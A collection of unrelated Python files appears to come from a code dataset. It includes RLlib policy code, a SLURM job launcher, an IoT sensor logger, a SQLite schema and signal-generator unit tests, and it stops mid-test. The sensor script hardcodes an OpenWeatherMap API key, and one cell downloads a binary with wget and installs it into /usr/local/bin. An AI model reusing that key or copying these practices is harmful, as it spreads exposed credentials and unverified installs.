**custom_opts["receiver_bias_opts"],
)
else:
receiver_bias_config = {}
use_inference_policy = custom_opts["use_inference_policy"]
if use_inference_policy:
if custom_opts["inference_policy_opts"]["type"] == "moving_avg":
# Update the moving average based on the rollout data
            # policy._avg_message_state used in build_apply_op() to store the current
# average for the next rollout
ewma_momentum = custom_opts["inference_policy_opts"]["ewma_momentum"]
unscaled_message_p = model.unscaled_message_p()
policy._avg_message_state = [tf.reduce_mean(unscaled_message_p, axis=0)]
if ewma_momentum is None:
policy._avg_message_state += [
tf.cast(tf.shape(unscaled_message_p)[0], dtype=tf.float32)
]
elif custom_opts["inference_policy_opts"]["type"] == "hyper_nn":
# Find true p(m) for training the p(m) estimator (not used in the paper)
# policy._pm_loss added to other losses (no scaling required since the p(m)
            # estimator and policy/value networks are independent)
pm_logits = model.pm_logits()
unscaled_message_p = model.unscaled_message_p()
pm_true = tf.reduce_mean(unscaled_message_p, axis=0)
policy._pm_loss = tf.reduce_sum(
tf.nn.softmax_cross_entropy_with_logits(labels=pm_true, logits=pm_logits)
)
else:
raise NotImplementedError("Wrong type for inference_policy")
# Inputs are reshaped from [B * T] => [T - 1, B] for V-trace calc.
policy.loss = CommBiasLoss(
actions=make_time_major(loss_actions, drop_last=False),
actions_logp=make_time_major(action_dist.logp(actions), drop_last=False),
actions_entropy=make_time_major(action_dist.multi_entropy(), drop_last=False),
message_entropy=make_time_major(action_dist.message_entropy(), drop_last=False),
dones=dones,
behaviour_action_logp=behaviour_action_logp,
behaviour_logits=make_time_major(unpacked_behaviour_logits, drop_last=False),
target_logits=make_time_major(unpacked_outputs, drop_last=False),
discount=policy.config["gamma"],
rewards=rewards,
values=make_time_major(values, drop_last=False),
bootstrap_value=bootstrap_value,
dist_class=dist_class,
model=model,
valid_mask=make_time_major(mask, drop_last=False),
config=policy.config,
vf_loss_coeff=policy.config["vf_loss_coeff"],
entropy_coeff=policy.entropy_coeff,
message_entropy_coeff=policy.config["model"]["custom_options"][
"message_entropy_coeff"
],
clip_rho_threshold=policy.config["vtrace_clip_rho_threshold"],
clip_pg_rho_threshold=policy.config["vtrace_clip_pg_rho_threshold"],
use_cpc=use_cpc,
**cpc_config,
use_sender_bias=use_sender_bias,
**sender_bias_config,
use_receiver_bias=use_receiver_bias,
**receiver_bias_config,
)
if hasattr(policy, "_pm_loss"):
return policy.loss.total_loss + policy._pm_loss
else:
return policy.loss.total_loss
def stats(policy, train_batch):
"""Stats to save during training"""
wasted_actions = tf.reduce_mean(train_batch[WASTED_ACTS])
core_stats = {
"cur_lr": tf.cast(policy.cur_lr, tf.float64),
"policy_loss": policy.loss.pi_loss,
"entropy": policy.loss.entropy,
"message_entropy": policy.loss.message_entropy,
"vf_loss": policy.loss.vf_loss,
"cpc_loss": policy.loss.cpc_loss,
"average_message_entropy": policy.loss.average_message_entropy,
"sender_bias_loss": policy.loss.sender_bias_loss,
"l_ce": policy.loss.l_ce,
"l_pl": policy.loss.l_pl,
"wasted_actions": wasted_actions,
}
if hasattr(policy.model, "_avg_message_p"):
core_stats["avg_message_p"] = policy.model._avg_message_p
if hasattr(policy, "_pm_loss"):
core_stats["pm_loss"] = policy._pm_loss
return core_stats
def build_apply_op(policy, optimizer, grads_and_vars):
"""
Override for custom gradient apply computation. Only change from the original policy
is setting the average message state in the case of inference based messaging.
"""
ops = [
optimizer.apply_gradients(
policy._grads_and_vars, global_step=tf.train.get_or_create_global_step()
)
]
if hasattr(policy, "_avg_message_state") and policy._avg_message_state is not None:
# Ops to update p(m) and optionally t for message probability scaling
ops.extend(policy.model.set_avg_message_state(policy._avg_message_state))
return ops
CommPolicy = CpcVTracePolicy.with_updates(
loss_fn=build_ma_comm_loss, stats_fn=stats, apply_gradients_fn=build_apply_op
)
SenderPolicy = CommPolicy.with_updates(name="Sender")
ReceiverPolicy = CommPolicy.with_updates(name="Receiver")
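# Illustrative wiring (an assumption, not part of this module): in RLlib of this
# era, per-agent policy classes like these are typically registered through the
# trainer's multiagent config, roughly as sketched below. The observation/action
# spaces and the agent ids ("sender"/"receiver") are placeholders.
#
#   config["multiagent"] = {
#       "policies": {
#           "sender": (SenderPolicy, sender_obs_space, sender_act_space, {}),
#           "receiver": (ReceiverPolicy, receiver_obs_space, receiver_act_space, {}),
#       },
#       "policy_mapping_fn": lambda agent_id: agent_id,
#   }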
| StarcoderdataPython |
3324117 | <filename>binreconfiguration/itemgenerator/intuniform.py
"""Item generator: integer uniform distribution"""
from .itemgenerator import ItemGenerator
import random
class IntUniform(ItemGenerator):
def __init__(self, lower_bound, upper_bound):
self._lower_bound = lower_bound
self._upper_bound = upper_bound
def item(self):
"""Return a random integer.
"""
return random.randint(self._lower_bound, self._upper_bound)
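# Minimal usage sketch (illustrative, not part of the original module); it
# assumes the ItemGenerator base class requires no extra constructor arguments.
if __name__ == '__main__':
    die = IntUniform(1, 6)  # fair six-sided die
    print([die.item() for _ in range(10)])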
| StarcoderdataPython |
1639463 | import os
from IPython.core.magic import register_line_magic
os.system('wget -qO tldr https://github.com/dbrgn/tealdeer/releases/download/v1.3.0/tldr-linux-x86_64-musl')
os.system('chmod +x tldr')
os.system('mv tldr /usr/local/bin')
os.system('tldr --update') # need once
@register_line_magic
def tldr(line):
get_ipython().system('tldr '+line)
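# Usage sketch (illustrative): once this cell has run in a notebook,
#   %tldr tar
# prints the tldr page for `tar` via the line magic registered above.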
| StarcoderdataPython |
3338189 | <reponame>wtriplett/lonestar4_launch<gh_stars>1-10
#!/usr/bin/env python
# launch script for stampede
# deals with both command files for parametric launcher and with single commands
import argparse
import sys,os
from tempfile import *
import subprocess
import math
MAXCORES=4104
MAXNODES=171
# set up argument args
def launch_slurm_ls5 (serialcmd='', script_name='', runtime='01:00:00',
jobname='launch', projname='', queue='normal', email=False, qsubfile='',
keepqsubfile=False, ignoreuser=False, test=False, parser=[], c=[], max_cores_per_node=None,
verbose=0, hold=[], outfile=[], cwd=[], nodes=0, use_hyperthreading=True):
if use_hyperthreading:
ncores_per_node = 48
else:
ncores_per_node = 24
if max_cores_per_node is None:
max_cores_per_node = ncores_per_node
elif int(max_cores_per_node) > ncores_per_node:
print("Requested max cores per node (%s) exceeds available cores per node (%d)." \
% (max_cores_per_node, ncores_per_node))
if use_hyperthreading is False:
print("Enabling hyperthreading (--ht) would double the available cores per node.")
sys.exit()
max_cores_per_node = int(max_cores_per_node)
if len(serialcmd) > 0:
print('sorry, serial mode is not currently supported')
sys.exit(1)
#parametric = 0
#print('Running serial command: '+cmd)
#nnodes = 1
#parenv = '1way'
#queue = 'serial'
elif script_name:
parametric = 1
print('Submitting parametric job file: ' + script_name)
try:
f = open(script_name,'r')
except:
            print('%s does not exist!' % script_name)
sys.exit(0)
script_cmds = f.readlines()
f.close()
ncmds = len(script_cmds)
print('found %d commands' % ncmds)
# need to check for empty lines
for s in script_cmds:
if s.strip() == '':
print('command file contains empty lines - please remove them first')
sys.exit()
if not nodes:
nodes = math.ceil(float(ncmds)/float(max_cores_per_node))
print('Number of compute nodes not specified - estimating as %d' % nodes)
if int(nodes) > MAXNODES:
            print('Warning: requested # of nodes (%d) exceeds max allowed, reducing to %d.' \
                % (nodes, MAXNODES))
nodes=MAXNODES
else:
print('ERROR: you must either specify a script name (using -s) or a command to run\n\n')
sys.exit()
if not qsubfile:
qsubfile,qsubfilepath = mkstemp(prefix=jobname+"_",dir='.',suffix='.slurm',text=True)
os.close(qsubfile)
total_cores = max_cores_per_node*int(nodes)
print('Outputting qsub commands to %s' % qsubfilepath)
qsubfile = open(qsubfilepath,'w')
qsubfile.write('#!/bin/bash\n#\n')
qsubfile.write('# SLURM control file automatically created by launch\n')
if parametric == 1:
qsubfile.write('#SBATCH -N %d\n'%int(nodes))
else:
print('sorry - serial mode is not currently supported')
sys.exit(1)
#qsubfile.write('# Launching single command: %s\n#\n#\n'%cmd)
qsubfile.write('#SBATCH -J %s # Job Name\n'%jobname)
qsubfile.write('#SBATCH -o {0}.o%j # Name of the output file (eg. myMPI.oJobID)\n'.format(jobname))
qsubfile.write('#SBATCH -p %s\n' % queue)
qsubfile.write('#SBATCH -t %s\n' % runtime)
qsubfile.write('#SBATCH -n %d\n' % total_cores) #ncmds)
if type(hold) is str:
qsubfile.write("#SBATCH -d afterok")
qsubfile.write(":{0}".format(int(hold)))
qsubfile.write('\n')
if projname != "":
qsubfile.write("#SBATCH -A {0}\n".format(projname))
try:
waitfor
    except NameError:
waitfor = None
if waitfor:
qsubfile.write('#SBATCH -d %d\n' % waitfor)
qsubfile.write('#----------------\n# Job Submission\n#----------------\n')
#qsubfile.write('umask 2\n\n')
if not parametric:
# currently not supported...
qsubfile.write('\n\nset -x # Echo commands, use "set echo" with csh\n')
qsubfile.write(cmd+'\n')
else:
#qsubfile.write('module load launcher\n')
qsubfile.write('export LAUNCHER_PLUGIN_DIR=$LAUNCHER_DIR/plugins\n')
qsubfile.write('export LAUNCHER_RMI=SLURM\n')
qsubfile.write('export LAUNCHER_JOB_FILE=%s\n'%script_name)
#qsubfile.write('cd $WORKDIR\n')
#qsubfile.write('echo " WORKING DIR: $WORKDIR/"\n')
qsubfile.write('$LAUNCHER_DIR/paramrun\n')
        qsubfile.write('echo " "\necho " Parametric Job Complete"\necho " "\n')
qsubfile.close()
jobid = None
if not test:
process = subprocess.Popen('sbatch %s' % qsubfilepath, shell=True, stdout=subprocess.PIPE)
for line in process.stdout:
print(line.strip())
if line.find('Submitted batch job') == 0:
jobid=int(line.strip().split(' ')[3])
process.wait()
if not keepqsubfile:
print('Deleting qsubfile: %s'%qsubfilepath)
os.remove(qsubfilepath)
return jobid
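# Illustrative call (hedged: the command file name, queue and node count below are
# placeholders, not values from this repository). With test=True the .slurm control
# file is written but sbatch is never invoked, which makes the generated script
# easy to inspect:
#   jobid = launch_slurm_ls5(script_name='commands.txt', runtime='02:00:00',
#                            jobname='demo', queue='normal', nodes=2,
#                            keepqsubfile=True, test=True)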
| StarcoderdataPython |
3345944 | from __future__ import print_function
import time
# import board
# import busio
# import adafruit_ads1x15.ads1015 as ADS
# from adafruit_ads1x15.analog_in import AnalogIn
# import Adafruit_DHT
import pyowm
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db as fb_db
from datetime import datetime
import json
import requests
import MySQLdb
import mysql.connector
def main():
now = datetime.now()
# settings for temperature sensor (comment out if not the right sensor):
# local_sensor_type = Adafruit_DHT.DHT22
# pin = 12
# only adjust cred file with data for sensor
with open('/home/pi/placed/sensor_creds/local_db_cred_sensor2.json', 'r') as file:
connection_dictionary = json.load(file)
# load data from creds file
for line in connection_dictionary:
host = line['host']
user = line['user']
password = line['password']
sensor = line['sensor']
is_generic = line['is_generic']
# open connection to local SQL-Database
localDB = mysql.connector.connect(
host=host,
user=user,
password=password,
database="placed"
)
    # cursor = element which reads/writes to/from the database. Only one is needed; two are used for readability
writeCursor = localDB.cursor()
readCursor = localDB.cursor()
    # firebase-realtime-database initialization with service-account credentials and uid-override
if not firebase_admin._apps:
cred = credentials.Certificate('/home/pi/placed_service_cred.json')
firebase_admin.initialize_app(cred, {
'databaseURL': 'https://placed-5b875-default-rtdb.europe-west1.firebasedatabase.app/',
'databaseAuthVariableOverride': {
'uid': 'sensor_placed_moist_1'
}
})
ref = fb_db.reference('/')
# connection to the Sensor. Uncomment right sensor type and adjust the connection parameters
# --- temperature and air-humidity sensor ---
# Adafruit_DHT.read_retry(local_sensor_type, pin)
# humidity, value = Adafruit_DHT.read_retry(local_sensor_type, pin)
# if humidity is not None and value is not None:
# print("Temp={0:0.1f}*C Humidity={1:0.1f}%"
# .format(value, humidity))
# else:
# print("Failed to get reading. Try again!")
# --- humidity-sensor ---
# i2c = busio.I2C(board.SCL, board.SDA)
# ads = ADS.ADS1015(i2c)
# chan = AnalogIn(ads, ADS.P0)
# value = 100 - (((float(chan.value) - 6000) / 12000) * 100)
# --- outdoor temperature from owm ---
request = requests.get(
'http://api.openweathermap.org/data/2.5/weather?q=Mainz&appid=1d8b79c5b6cfa1b5982dfb7f4db4bcfd&units=metric')
data = request.json()
for key in data['main']:
content = data['main'].get(key, '')
if key == "temp":
value = content
# --- outdoor weather type from owm ---
# r = requests.get(
# 'http://api.openweathermap.org/data/2.5/weather?q=Mainz&appid=1d8b79c5b6cfa1b5982dfb7f4db4bcfd&units=metric')
# json_content = json.loads(r.content)
# weather_id = json_content.get('weather').__getitem__(0).get('id')
print('value: ' + str(value))
# sql command for saving data to local server
sql = "INSERT INTO `data`(`sensor`, `is_generic`, `value`, `data_type`, `year`, `month`, `day`, `hour`, `minute`) VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s')" % \
(sensor, is_generic, value, 'single', now.year, now.month, now.day, now.hour, now.minute)
# execution of sql command with fail-safe
try:
writeCursor.execute(sql)
localDB.commit()
print("data from sensor " + sensor + " inserted into " + host)
except Exception as e:
print("Error. Rolling back")
print(e)
# sql-command for getting the last entered id
sql = "SELECT id FROM data WHERE sensor = %s ORDER BY id DESC LIMIT 1"
inp = (sensor,)
readCursor.execute(sql, inp)
readResult = readCursor.fetchone()
# try to save the data to the firebase database with fail-safe
try:
data_ref = ref.child('data_by_sensors').child(sensor)
data_ref.update({
'id':readResult[0],
'sensor': int(sensor),
'is_generic': is_generic,
'value':value,
'data_type': 'single',
'year': now.year,
'month': now.month,
'day': now.day,
'hour': now.hour,
'minute': now.minute,
'requestUpdate': 0
})
print("data from sensor " + sensor + " uploaded to firebase")
except Exception as e:
print("Error. Rolling back")
print(e)
if __name__ == "__main__":
main() | StarcoderdataPython |
133563 | import sqlite3
from config.constants import DB_NAME
if __name__ == '__main__':
conn = sqlite3.connect(str(DB_NAME), detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
cursor = conn.cursor()
cursor.execute('''CREATE TABLE IF NOT EXISTS nodes
(node_number INTEGER PRIMARY KEY ,
node_name VARCHAR(100) NOT NULL );''')
cursor.execute('''CREATE TABLE IF NOT EXISTS temperature
(temperature_id INTEGER PRIMARY KEY,
temperature REAL NOT NULL,
time_stamp TIMESTAMP,
node_id INTEGER NOT NULL,
FOREIGN KEY (node_id) REFERENCES nodes(node_number));''')
conn.commit()
conn.close()
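# Illustrative helper (an assumption, not part of the original script): once the
# schema above exists, a reading could be stored like this, using the column
# names from the CREATE TABLE statements above.
def insert_reading(node_number, temperature, time_stamp):
    conn = sqlite3.connect(str(DB_NAME), detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
    cursor = conn.cursor()
    cursor.execute(
        "INSERT INTO temperature (temperature, time_stamp, node_id) VALUES (?, ?, ?)",
        (temperature, time_stamp, node_number))
    conn.commit()
    conn.close()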
| StarcoderdataPython |
1653209 | <reponame>ECSLab/ES_IoT_Cloud
import urllib.parse
import urllib.request
import time
def postt(posturl, data):
req = urllib.request.Request(posturl, data)
return urllib.request.urlopen(req)
if __name__ == '__main__':
posturl = 'http://127.0.0.1:9000/upload'
dd = urllib.parse.urlencode({
'api_key': 'sdakasyri',
'device_id': '1',
'data': 'ON'}).encode('utf-8')
while(True):
postt(posturl, dd)
time.sleep(2)
| StarcoderdataPython |
30532 | <reponame>vanish125/DS1054_BodePlotter
"""Unit tests for fygen module."""
import unittest
import six
import fygen
import fygen_help
from wavedef import SUPPORTED_DEVICES
# pylint: disable=too-many-public-methods
# pylint: disable=invalid-name
# pylint: disable=too-many-lines
class FakeSerial(object):
"""Fake serial object for when more interaction is required."""
def __init__(self, read_lines):
self.read_lines = read_lines
self.write_lines = []
def getvalue(self):
return ''.join(self.write_lines)
def write(self, line):
self.write_lines.append(line.decode('utf8'))
# pylint: disable=unused-argument
# pylint: disable=no-self-use
def flush(self):
pass
def read(self, unused_length):
return '\n'
def reset_input_buffer(self):
pass
def reset_output_buffer(self):
pass
def read_until(self, terminator='\n', size=0):
"""fake read_until method."""
r = self.read_lines[0]
del self.read_lines[0]
return r
# pylint: enable=unused-argument
# pylint: enable=no-self-use
class TestFYGen(unittest.TestCase):
"""Test harness for FYGen."""
def setUp(self):
self.output = six.StringIO()
self.fy = fygen.FYGen(
port=self.output,
init_state=False,
device_name='fy2300',
)
def tearDown(self):
self.fy.close()
def test_help(self):
"""Asserts that all help sections render."""
for section in range(len(fygen_help.SECTIONS)):
fygen.help(section, fout=self.output)
self.assertIn('Other Help Sections', self.output.getvalue())
def test_help_device(self):
"""Tests calling help with a device name."""
for section in range(len(fygen_help.SECTIONS)):
fygen.help(section, 'fy2300', self.output)
self.assertIn('Other Help Sections', self.output.getvalue())
def test_help_invalid_section(self):
"""Provides an invalid help section number."""
with self.assertRaises(fygen.HelpError):
fygen.help(len(fygen_help.SECTIONS))
def test_get_version(self):
"""Tests the version command."""
self.assertEqual(1.0, fygen.get_version())
def test_autoset(self):
"""Tests autoset functionality."""
fy = fygen.FYGen(port=self.output)
fy.set((0, 1))
val = self.output.getvalue()
self.assertIn('WMN0\n', val)
self.assertIn('WFN0\n', val)
def test_autoset_with_args(self):
"""Tests autoset with additional arguments provided."""
fy = fygen.FYGen(port=self.output)
fy.set(wave='square', volts=0.1)
val = self.output.getvalue()
self.assertIn('WMW01\n', val)
self.assertIn('WMA0.10\n', val)
def test_send(self):
"""Tests the low-level send."""
fs = FakeSerial([b'foo\n', b'bar\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('foo', fy.send('foocmd'))
self.assertEqual('bar', fy.send('barcmd'))
self.assertEqual('foocmd\nbarcmd\n', fs.getvalue())
def test_send_too_short(self):
"""Provides a command that is too short."""
with self.assertRaises(fygen.CommandTooShortError):
self.fy.send('FO')
def test_set_enable(self):
"""Enables generator on both channels."""
self.fy.set(channel=(0, 1), volts=3, enable=True)
self.assertEqual(
'WMA3.00\n'
'WMN1\n'
'WFA3.00\n'
'WFN1\n',
self.output.getvalue())
def test_already_enabled(self):
"""Tests WMN1 is not sent if the channel is already enabled."""
fs = FakeSerial([b'1\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, enable=True)
self.assertEqual('RMN\n', fs.getvalue())
def test_set_disable(self):
"""Tests disable function on both channels."""
fy = fygen.FYGen(port=self.output, default_channel=(0, 1), init_state=False)
fy.set(volts=3, enable=False)
self.assertEqual(
'WMN0\n'
'WMA3.00\n'
'WFN0\n'
'WFA3.00\n',
self.output.getvalue())
def test_already_disabled(self):
"""Tests that WMN0 is not sent if the channel is already disabled."""
fs = FakeSerial([b'0\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, enable=False)
self.assertEqual('RMN\n', fs.getvalue())
def test_invalid_channel(self):
"""Passes an invalid channel."""
with self.assertRaises(fygen.InvalidChannelError):
self.fy.set(channel=2)
def test_set_wave1(self):
"""Sets current wave by name."""
self.fy.set(wave='sin')
self.fy.set(channel=1, wave='square')
self.assertEqual(
'WMW00\n'
'WFW01\n',
self.output.getvalue())
def test_set_wave2(self):
"""Sets current wave by number."""
self.fy.set(wave=46)
self.assertEqual('WMW46\n', self.output.getvalue())
def test_wave_already_set(self):
"""Asserts a wave that is already square is not reset to square."""
fs = FakeSerial([b'1\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, wave='square')
self.assertEqual('RMW\n', fs.getvalue())
def test_unknown_wave(self):
"""Passes an unknown waveform name."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set(wave='foo')
def test_invalid_wave_index(self):
"""Passes an invalid waveform index."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set(wave=-1)
def test_set_freq1(self):
"""Sets a frequency using freq_hz."""
self.fy.set(freq_hz=5000)
self.fy.set(channel=1, freq_hz=1e6)
self.assertEqual(
'WMF00005000000000\n'
'WFF01000000000000\n',
self.output.getvalue())
def test_set_freq2(self):
"""Sets a frequency using freq_uhz."""
self.fy.set(freq_uhz=5000)
self.fy.set(channel=1, freq_uhz=1e6)
self.assertEqual(
'WMF00000000005000\n'
'WFF00000001000000\n',
self.output.getvalue())
def test_freq_already_set1(self):
"""Tests that a frequency is not reset to the same thing."""
fs = FakeSerial([b'12345\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, freq_hz=12345)
self.assertEqual('RMF\n', fs.getvalue())
def test_freq_already_set2(self):
"""Tests that a frequency is not reset to the same thing."""
fs = FakeSerial([b'1234.5\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, freq_uhz=1234500000)
self.assertEqual('RMF\n', fs.getvalue())
def test_set_both_frequencies(self):
"""Tries passing both freq_hz and freq_uhz."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_hz=4000, freq_uhz=5000)
def test_invalid_freq1(self):
"""Tries passing a negative frequency (freq_hz version)."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_hz=-1)
def test_invalid_freq2(self):
"""Tries passing a negative frequency (freq_uhz version)."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_uhz=-1)
def test_set_volts(self):
"""Sets voltage amplitude on both channels."""
self.fy.set(volts=10)
self.fy.set(channel=1, volts=0)
self.assertEqual(
'WMA10.00\n'
'WFA0.00\n',
self.output.getvalue())
def test_volts_already_set(self):
"""Tries to set the voltage to an already set value."""
fs = FakeSerial([b'56000\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, volts=5.6)
self.assertEqual('RMA\n', fs.getvalue())
def test_volts_too_low(self):
"""Tries to set the voltage to a negative value."""
fy = fygen.FYGen(port=self.output)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=-0.1)
def test_volts_too_high(self):
"""Tries to set the voltage higher than the allowed maximum."""
fy = fygen.FYGen(port=self.output, max_volts=1.5)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=1.6)
def test_duty_cycle(self):
"""Sets the duty cycle on both channels."""
self.fy.set(duty_cycle=0.5)
self.fy.set(channel=1, duty_cycle=0.9)
self.assertEqual(
'WMD50.0\n'
'WFD90.0\n',
self.output.getvalue())
def test_duty_cycle_already_set(self):
"""Sets the duty cycle to an already-set value."""
fs = FakeSerial([b'10500\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, duty_cycle=0.105)
self.assertEqual('RMD\n', fs.getvalue())
def test_duty_cycle_too_low(self):
"""Tries to set the duty cycle to zero."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set(duty_cycle=0)
def test_duty_cycle_too_high(self):
"""Tries to set the duty cycle to one."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set(duty_cycle=1)
def test_offset_volts(self):
"""Sets the offset voltage on both channels."""
self.fy.set(offset_volts=1.5)
self.fy.set(channel=1, offset_volts=-1.6)
self.assertEqual(
'WMO1.50\n'
'WFO-1.60\n',
self.output.getvalue())
def test_offset_volts_already_set(self):
"""Tries to set the offset voltage to a value already set."""
fs = FakeSerial([b'12340\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, offset_volts=12.34)
self.assertEqual('RMO\n', fs.getvalue())
def test_offset_volts_too_low(self):
"""Tries to set the offset voltage too low."""
fy = fygen.FYGen(port=self.output, min_volts=-1.5, init_state=False)
with self.assertRaises(fygen.InvalidVoltageOffsetError):
fy.set(offset_volts=-1.6)
def test_offset_volts_too_high(self):
"""Tries to set the offset voltage too high."""
fy = fygen.FYGen(port=self.output, max_volts=1.5, init_state=False)
with self.assertRaises(fygen.InvalidVoltageOffsetError):
fy.set(offset_volts=1.6)
def test_phase(self):
"""Sets the phase on both channels."""
self.fy.set(phase_degrees=10)
self.fy.set(channel=1, phase_degrees=380.3)
self.assertEqual(
'WMP10.000\n'
'WFP20.300\n',
self.output.getvalue())
def test_phase_already_set(self):
"""Tries to set the phase to an already-set value."""
fs = FakeSerial([b'189300\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, phase_degrees=189.3)
self.assertEqual('RMP\n', fs.getvalue())
def test_set_modulation(self):
"""Tries every known combination of modulatin and trigger."""
self.fy.set_modulation(mode=fygen.MODULATION_FSK)
self.fy.set_modulation(mode=fygen.MODULATION_ASK)
self.fy.set_modulation(mode=fygen.MODULATION_PSK)
self.fy.set_modulation(mode=fygen.MODULATION_BURST)
self.fy.set_modulation(mode=fygen.MODULATION_AM)
self.fy.set_modulation(mode=fygen.MODULATION_FM)
self.fy.set_modulation(mode=fygen.MODULATION_PM)
self.fy.set_modulation(trigger=fygen.TRIGGER_CH2)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_AC)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_IN)
self.fy.set_modulation(trigger=fygen.TRIGGER_MANUAL)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_DC)
self.fy.set_modulation(burst_count=76)
self.fy.set_modulation(am_attenuation=0.121)
self.fy.set_modulation(pm_bias_degrees=23.4)
self.fy.set_modulation(hop_freq_hz=1234)
self.fy.set_modulation(hop_freq_uhz=1234)
self.fy.set_modulation(fm_bias_freq_hz=1234)
self.fy.set_modulation(fm_bias_freq_uhz=1234)
self.assertEqual(
'WPF0\n'
'WPF1\n'
'WPF2\n'
'WPF3\n'
'WPF4\n'
'WPF5\n'
'WPF6\n'
'WPM0\n'
'WPM1\n'
'WPM1\n'
'WPM2\n'
'WPM3\n'
'WPN76\n'
'WPR12.1\n'
'WPP23.4\n'
'WFK00001234000000\n'
'WFK00000000001234\n'
'WFM00001234000000\n'
'WFM00000000001234\n',
self.output.getvalue())
def test_invalid_modulation_mode(self):
"""Tries to set invalid modulation modes."""
with self.assertRaises(fygen.InvalidModulationModeError):
self.fy.set_modulation(mode=-1)
with self.assertRaises(fygen.InvalidModulationModeError):
self.fy.set_modulation(mode=7)
def test_invalid_burst_cycle_count(self):
"""Tries to set an invalid burst cycle count."""
with self.assertRaises(fygen.InvalidBurstCycleCountError):
self.fy.set_modulation(burst_count=0)
def test_invalid_trigger_mode(self):
"""Tries to set invalid trigger modes."""
with self.assertRaises(fygen.InvalidTriggerModeError):
self.fy.set_modulation(trigger=-1)
with self.assertRaises(fygen.InvalidTriggerModeError):
self.fy.set_modulation(trigger=4)
def test_invalid_am_attenuation(self):
"""Tries to set an invalid rate percentage."""
with self.assertRaises(fygen.InvalidAMAttenuationError):
self.fy.set_modulation(am_attenuation=-0.1)
with self.assertRaises(fygen.InvalidAMAttenuationError):
self.fy.set_modulation(am_attenuation=2.1)
def test_invalid_hop_frequency(self):
"""Tries to set an invalid hop frequency."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_hz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_uhz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_hz=1, hop_freq_uhz=1)
def test_invalid_fm_bias_frequency(self):
"""Tries to set an invalid fm bias frequency."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_hz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_uhz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_hz=1, fm_bias_freq_uhz=1)
def test_get_enable(self):
"""Gets the current enable status."""
fs = FakeSerial([b'255\n', b'0\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(True, fy.get(0, 'enable'))
self.assertEqual(False, fy.get(1, 'enable'))
self.assertEqual('RMN\nRFN\n', fs.getvalue())
def test_get(self):
"""Calls get with no arguments."""
fs = FakeSerial([
b'50000\n', # duty cycle
b'255\n', # enable
b'12345.6789\n', # freq hz
b'12340\n', # offset volts
b'189300\n', # phase degrees
b'123400\n', # volts
b'4\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({
'duty_cycle': 0.5,
'enable': True,
'freq_hz': 12345,
'offset_volts': 12.34,
'phase_degrees': 189.3,
'volts': 12.34,
'wave': 'dc',
}, fy.get())
self.assertEqual(
'RMD\n'
'RMN\n'
'RMF\n'
'RMO\n'
'RMP\n'
'RMA\n'
'RMW\n'
'',
fs.getvalue())
def test_get_wave(self):
"""Gets the current wave."""
fs = FakeSerial([b'4\n', b'4\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('dc', fy.get(0, 'wave'))
self.assertEqual({'wave': 'tri'}, fy.get(1, ('wave',)))
self.assertEqual('RMW\nRFW\n', fs.getvalue())
def test_get_invalid_channel(self):
"""Tries to pass an invalid channel."""
with self.assertRaises(fygen.InvalidChannelError):
self.fy.get(2, 'wave')
def test_get_invalid_parameter(self):
"""Tries to pass an invalid parameter."""
with self.assertRaises(fygen.UnknownParameterError):
self.fy.get(0, 'foo')
def test_get_invalid_waveform_index(self):
"""Unrecognized wave index is returned by the siggen."""
fs = FakeSerial([b'100\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.UnknownWaveformError):
fy.get(0, 'wave')
def test_get_freq1(self):
"""Gets the frequency in Hz."""
fs = FakeSerial([b'12345.6789\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12345, fy.get(0, 'freq_hz'))
self.assertEqual('RMF\n', fs.getvalue())
def test_get_freq2(self):
"""Gets the frequency in uHz."""
fs = FakeSerial([b'12345.6789\n'])
fy = fygen.FYGen(port=fs)
